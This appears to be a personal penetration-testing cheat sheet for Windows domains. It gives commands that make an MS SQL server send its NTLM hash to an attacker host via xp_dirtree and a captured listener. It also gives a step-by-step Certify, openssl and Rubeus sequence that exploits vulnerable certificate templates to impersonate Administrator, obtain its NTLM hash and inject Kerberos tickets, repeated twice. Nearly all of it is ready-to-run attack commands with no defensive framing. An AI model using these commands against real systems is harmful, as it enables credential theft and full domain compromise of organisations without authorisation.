# Windows

## MS SQL

### Stealing NTLM hash 

need one of this permission

```
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_fileexist';
EXEC sp_helprotect 'xp_subdirs';
```

Then:

```
xp_dirtree '\\IP_ADDR\ANY`
```

After that responder should catch NTLM hash

## Vulnerable certificates

1. `.\Certify.exe find /vulnerable` - this finds any vulnerable template
2. `.\Certify.exe request /ca:<copy from output above> /template:<name of tempate> /altname:<user to impersonate>`
3. Copy PEM certificate and convert it with: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx`
4. `.\rubues.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials`
5. Copy NTLM hash and PassTheHash
6. `.\rubues.exe asktgt /user:Administrator /certificate:cert.pfx /ptt` should inject kerberos ticket to current session but it wont always work

```
1. .\Certify.exe find /vulnerable - this finds any vulnerable tempalte
2. .\Certify.exe request /ca:<copy from output above> /template:<name of template> /altname:<user to impersonate>
3. Copy PEM certificate and convert it with openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
4. .\rubues.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
5. Copy NTLM hash and PassTheHash
5.5 .\rubues.exe asktgt /user:Administrator /certificate:cert.pfx /ptt should inject kerberos ticket to current session but it wont always work 
```